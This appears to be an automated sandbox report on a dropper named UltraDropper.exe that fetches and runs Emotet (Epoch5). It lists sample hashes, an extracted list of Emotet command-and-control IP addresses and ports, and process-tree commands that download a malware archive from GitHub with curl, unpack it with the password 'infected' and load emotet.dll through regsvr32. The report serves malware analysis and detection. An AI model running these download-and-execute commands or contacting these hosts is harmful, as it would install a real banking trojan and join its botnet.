Analysis
-
max time kernel
241s -
max time network
209s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
31-05-2024 07:23
Static task
static1
General
-
Target
UltraDropper.exe
-
Size
57KB
-
MD5
354274b178062ef85722f8204629e78d
-
SHA1
616229aa8f5169938a9f5b872cc03a60209fa46b
-
SHA256
d93cfa3cdbae1d62f1b55b7a0b60b547834cc144af1fc28b8afd69f9065f7f02
-
SHA512
afb96510a0c38a9e4eb74040adc504dc3ff46b4845ea60b2271296e28f530e0d8cf7df3d6c2b5d47fc9c0334792c6621b8b48ec06cfe66701353d357d7a5a53f
-
SSDEEP
768:/t+et7EWvq3fuXjUp2+1pMh4d/J/rflOeTqOW7xQ8VORH:ztGfuLc/J/blOtr7xQ8Vs
Malware Config
Extracted
emotet
Epoch5
178.238.225.252:8080
139.196.72.155:8080
36.67.23.59:443
103.56.149.105:8080
37.44.244.177:8080
85.25.120.45:8080
202.134.4.210:7080
78.47.204.80:443
83.229.80.93:8080
93.104.209.107:8080
80.211.107.116:8080
165.22.254.236:8080
104.244.79.94:443
185.148.169.10:8080
190.145.8.4:443
175.126.176.79:8080
139.59.80.108:8080
188.165.79.151:443
128.199.217.206:443
64.227.55.231:8080
218.38.121.17:443
103.71.99.57:8080
103.224.241.74:8080
128.199.242.164:8080
85.214.67.203:8080
103.254.12.236:7080
46.101.98.60:8080
178.62.112.199:8080
210.57.209.142:8080
195.77.239.39:8080
103.126.216.86:443
82.98.180.154:7080
202.28.34.99:8080
174.138.33.49:7080
160.16.143.191:8080
51.75.33.122:443
103.41.204.169:8080
186.250.48.5:443
87.106.97.83:7080
118.98.72.86:443
196.44.98.190:8080
103.85.95.4:8080
62.171.178.147:8080
54.37.228.122:443
114.79.130.68:443
198.199.70.22:8080
Signatures
-
Loads dropped DLL 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 3672 regsvr32.exe 4628 regsvr32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
regsvr32.exeregsvr32.exepid process 3672 regsvr32.exe 3672 regsvr32.exe 4628 regsvr32.exe 4628 regsvr32.exe 4628 regsvr32.exe 4628 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
7z.exe7zG.exedescription pid process Token: SeRestorePrivilege 2700 7z.exe Token: 35 2700 7z.exe Token: SeSecurityPrivilege 2700 7z.exe Token: SeSecurityPrivilege 2700 7z.exe Token: SeRestorePrivilege 404 7zG.exe Token: 35 404 7zG.exe Token: SeSecurityPrivilege 404 7zG.exe Token: SeSecurityPrivilege 404 7zG.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
7zG.exepid process 404 7zG.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
UltraDropper.execmd.execmd.execmd.exeregsvr32.exedescription pid process target process PID 3380 wrote to memory of 3656 3380 UltraDropper.exe cmd.exe PID 3380 wrote to memory of 3656 3380 UltraDropper.exe cmd.exe PID 3380 wrote to memory of 3656 3380 UltraDropper.exe cmd.exe PID 3656 wrote to memory of 3464 3656 cmd.exe curl.exe PID 3656 wrote to memory of 3464 3656 cmd.exe curl.exe PID 3656 wrote to memory of 3464 3656 cmd.exe curl.exe PID 3656 wrote to memory of 2700 3656 cmd.exe 7z.exe PID 3656 wrote to memory of 2700 3656 cmd.exe 7z.exe PID 4008 wrote to memory of 2396 4008 cmd.exe curl.exe PID 4008 wrote to memory of 2396 4008 cmd.exe curl.exe PID 1688 wrote to memory of 3672 1688 cmd.exe regsvr32.exe PID 1688 wrote to memory of 3672 1688 cmd.exe regsvr32.exe PID 3672 wrote to memory of 4628 3672 regsvr32.exe regsvr32.exe PID 3672 wrote to memory of 4628 3672 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"C:\Users\Admin\AppData\Local\Temp\UltraDropper.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\SysWOW64\cmd.execmd /c curl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet(Epoch5)-.2022 10483280p" && "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"2⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\curl.execurl -L -o "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" "https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet(Epoch5)-.2022 10483280p"3⤵PID:3464
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:700
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\system32\curl.execurl -L -o "Emotet-Epoch5.zip" https://github.com/Princekin/malware-database/raw/main/Emotet/Emotet%20(Epoch5)%20-%2004.11.2022%20.zip2⤵PID:2396
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5\" -spe -an -ai#7zMap9460:106:7zEvent23101⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:404
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\regsvr32.exeregsvr32 emotet.dll2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\QHAJNsT\yVWoZrzUSiIo.dll"3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4628
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zipFilesize
90B
MD501f4771c47a56dbdf77642c80eb9b799
SHA16aead125925ec84c9171e3b29b9c2fc00682bda5
SHA256eec0a51a966b712aaccd11df320373becc55f174b97030419f9fae79f0cf542c
SHA5128f4e2f726b5dd362d40e4576d53c426b262c3bbc48387f4d9ca18e4e70a78f77a1ffb007cb498b31523ca1278dd61a6c33fee636b732915a27f27248639e2162
-
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5.zipFilesize
289KB
MD5ebe6bc9eab807cdd910976a341bc070d
SHA11052700b1945bb1754f3cadad669fc4a99f5607b
SHA256b0353f4547466a0a402198b3750d928fc7c4e96dd3adc00b181e9d98e4602ea7
SHA5129a6bfcb90c1e24be1b930990dd2af72e889f71ad7e1a7b8353b6522a625e2ae36013793ee2c159880bd510b8f785ce4c9dfced1d2901d3ca8f091e26084185a8
-
C:\Users\Admin\AppData\Local\Temp\Emotet-Epoch5\emotet.dllFilesize
534KB
MD556bb8500d7ab6860760eddd7a55e9456
SHA1e9b38c5fb51ce1a038f65c1620115a9bba1e383d
SHA256b4bead39ead2a29de2f0a6fb52eea172cfe25224b71e4a9b1418f55c8b053d59
SHA51283ceff476d071412b02bab0753bd3c4440937b663397d73349fa90c38d96cf88051b645c781cbe5de281aa3bd45e71da7fcc8c99c2846ce29c2f36c3e1307a84
-
memory/3380-0-0x0000000000410000-0x0000000000422000-memory.dmpFilesize
72KB
-
memory/3672-9-0x0000000002A00000-0x0000000002A30000-memory.dmpFilesize
192KB
-
memory/3672-13-0x0000000180000000-0x000000018008C000-memory.dmpFilesize
560KB